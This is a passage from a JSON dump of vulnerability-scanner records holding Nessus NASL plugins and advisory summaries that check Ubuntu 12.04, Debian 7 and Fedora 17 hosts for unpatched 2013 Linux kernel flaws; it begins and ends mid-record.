Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69809);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1059\", \"CVE-2013-1060\", \"CVE-2013-2164\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-2851\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_bugtraq_id(60375, 60409, 60922);\n script_xref(name:\"USN\", value:\"1941-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-1941-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chanam Park reported a NULL pointer flaw in the Linux kernel's Ceph\nclient. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash). (CVE-2013-1059)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nJonathan Salwan discovered an information leak in the Linux kernel's\ncdrom driver. A local user can exploit this leak to obtain sensitive\ninformation from kernel memory if the CD-ROM drive is malfunctioning.\n(CVE-2013-2164)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nKees Cook discovered a format string vulnerability in the Linux\nkernel's disk block layer. A local user with administrator privileges\ncould exploit this flaw to gain kernel privileges. (CVE-2013-2851)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1941-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1059\", \"CVE-2013-1060\", \"CVE-2013-2164\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-2851\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1941-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-53-generic\", pkgver:\"3.2.0-53.81\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-53-generic-pae\", pkgver:\"3.2.0-53.81\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-53-highbank\", pkgver:\"3.2.0-53.81\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-53-virtual\", pkgver:\"3.2.0-53.81\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-04-01T07:23:11", "description": "A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nDan Carpenter discovered an information leak in the HP Smart Aray and\nCompaq SMART2 disk-array driver in the Linux kernel. A local user\ncould exploit this flaw to obtain sensitive information from kernel\nmemory. (CVE-2013-2147).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2013-11-09T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2017-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2147", "CVE-2012-5375", "CVE-2012-5374"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2017-1.NASL", "href": "https://www.tenable.com/plugins/nessus/70801", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2017-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70801);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-2147\");\n script_bugtraq_id(56939, 56940, 60280);\n script_xref(name:\"USN\", value:\"2017-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2017-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nDan Carpenter discovered an information leak in the HP Smart Aray and\nCompaq SMART2 disk-array driver in the Linux kernel. A local user\ncould exploit this flaw to obtain sensitive information from kernel\nmemory. (CVE-2013-2147).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2017-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-2147\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2017-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-56-generic\", pkgver:\"3.2.0-56.86\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-56-generic-pae\", pkgver:\"3.2.0-56.86\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-56-highbank\", pkgver:\"3.2.0-56.86\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-56-virtual\", pkgver:\"3.2.0-56.86\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:48:04", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leak or privilege\nescalation. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-1059\n Chanam Park reported an issue in the Ceph distributed\n storage system. Remote users can cause a denial of\n service by sending a specially crafted auth_reply\n message.\n\n - CVE-2013-2148\n Dan Carpenter reported an information leak in the\n filesystem wide access notification subsystem\n (fanotify). Local users could gain access to sensitive\n kernel memory.\n\n - CVE-2013-2164\n Jonathan Salwan reported an information leak in the\n CD-ROM driver. A local user on a system with a\n malfunctioning CD-ROM drive could gain access to\n sensitive memory.\n\n - CVE-2013-2232\n Dave Jones and Hannes Frederic Sowa resolved an issue in\n the IPv6 subsystem. Local users could cause a denial of\n service by using an AF_INET6 socket to connect to an\n IPv4 destination.\n\n - CVE-2013-2234\n Mathias Krause reported a memory leak in the\n implementation of PF_KEYv2 sockets. Local users could\n gain access to sensitive kernel memory.\n\n - CVE-2013-2237\n Nicolas Dichtel reported a memory leak in the\n implementation of PF_KEYv2 sockets. Local users could\n gain access to sensitive kernel memory.\n\n - CVE-2013-2851\n Kees Cook reported an issue in the block subsystem.\n Local users with uid 0 could gain elevated ring 0\n privileges. This is only a security issue for certain\n specially configured systems.\n\n - CVE-2013-2852\n Kees Cook reported an issue in the b43 network driver\n for certain Broadcom wireless devices. Local users with\n uid 0 could gain elevated ring 0 privileges. This is\n only a security issue for certain specially configured\n systems.\n\n - CVE-2013-4162\n Hannes Frederic Sowa reported an issue in the IPv6\n networking subsystem. Local users can cause a denial of\n service (system crash).\n\n - CVE-2013-4163\n Dave Jones reported an issue in the IPv6 networking\n subsystem. Local users can cause a denial of service\n (system crash).\n\nThis update also includes a fix for a regression in the Xen subsystem.", "edition": 16, "published": "2013-08-30T00:00:00", "title": "Debian DSA-2745-1 : linux - privilege escalation/denial of service/information leak", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-2852", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-2148", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2237", "CVE-2013-2164"], "modified": "2013-08-30T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-2745.NASL", "href": "https://www.tenable.com/plugins/nessus/69505", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2745. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69505);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1059\", \"CVE-2013-2148\", \"CVE-2013-2164\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-2237\", \"CVE-2013-2851\", \"CVE-2013-2852\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_bugtraq_id(60341, 60375, 60409, 60410, 60874, 60893, 60922, 60953, 61411, 61412);\n script_xref(name:\"DSA\", value:\"2745\");\n\n script_name(english:\"Debian DSA-2745-1 : linux - privilege escalation/denial of service/information leak\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leak or privilege\nescalation. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-1059\n Chanam Park reported an issue in the Ceph distributed\n storage system. Remote users can cause a denial of\n service by sending a specially crafted auth_reply\n message.\n\n - CVE-2013-2148\n Dan Carpenter reported an information leak in the\n filesystem wide access notification subsystem\n (fanotify). Local users could gain access to sensitive\n kernel memory.\n\n - CVE-2013-2164\n Jonathan Salwan reported an information leak in the\n CD-ROM driver. A local user on a system with a\n malfunctioning CD-ROM drive could gain access to\n sensitive memory.\n\n - CVE-2013-2232\n Dave Jones and Hannes Frederic Sowa resolved an issue in\n the IPv6 subsystem. Local users could cause a denial of\n service by using an AF_INET6 socket to connect to an\n IPv4 destination.\n\n - CVE-2013-2234\n Mathias Krause reported a memory leak in the\n implementation of PF_KEYv2 sockets. Local users could\n gain access to sensitive kernel memory.\n\n - CVE-2013-2237\n Nicolas Dichtel reported a memory leak in the\n implementation of PF_KEYv2 sockets. Local users could\n gain access to sensitive kernel memory.\n\n - CVE-2013-2851\n Kees Cook reported an issue in the block subsystem.\n Local users with uid 0 could gain elevated ring 0\n privileges. This is only a security issue for certain\n specially configured systems.\n\n - CVE-2013-2852\n Kees Cook reported an issue in the b43 network driver\n for certain Broadcom wireless devices. Local users with\n uid 0 could gain elevated ring 0 privileges. This is\n only a security issue for certain specially configured\n systems.\n\n - CVE-2013-4162\n Hannes Frederic Sowa reported an issue in the IPv6\n networking subsystem. Local users can cause a denial of\n service (system crash).\n\n - CVE-2013-4163\n Dave Jones reported an issue in the IPv6 networking\n subsystem. Local users can cause a denial of service\n (system crash).\n\nThis update also includes a fix for a regression in the Xen subsystem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=701744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-1059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2148\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2164\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2851\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2745\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux and user-mode-linux packages.\n\nFor the stable distribution (wheezy), these problems has been fixed in\nversion 3.2.46-1+deb7u1.\n\nThe following matrix lists additional source packages that were\nrebuilt for compatibility with or to take advantage of this update :\n\n Debian 7.0 (wheezy) \n user-mode-linux 3.2-2um-1+deb7u2 \nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or 'leap-frog' fashion.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.46-1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:10:55", "description": "Update to latest stable upstream release, Linux v3.9.10\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-07-19T00:00:00", "title": "Fedora 17 : kernel-3.9.10-100.fc17 (2013-12990)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-1059", "CVE-2013-2232"], "modified": "2013-07-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-12990.NASL", "href": "https://www.tenable.com/plugins/nessus/68974", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-12990.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68974);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1059\", \"CVE-2013-2232\", \"CVE-2013-2234\");\n script_bugtraq_id(60874, 60893, 60922);\n script_xref(name:\"FEDORA\", value:\"2013-12990\");\n\n script_name(english:\"Fedora 17 : kernel-3.9.10-100.fc17 (2013-12990)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest stable upstream release, Linux v3.9.10\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=977356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=980995\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=981552\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/111909.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2316bbf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"kernel-3.9.10-100.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:10:54", "description": "Update to latest upstream stable release, Linux v3.9.9. This also\nincludes fixes for issues running VM guests some people were seeing.\nUpdate to latest stable upstream release, Linux v3.9.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": 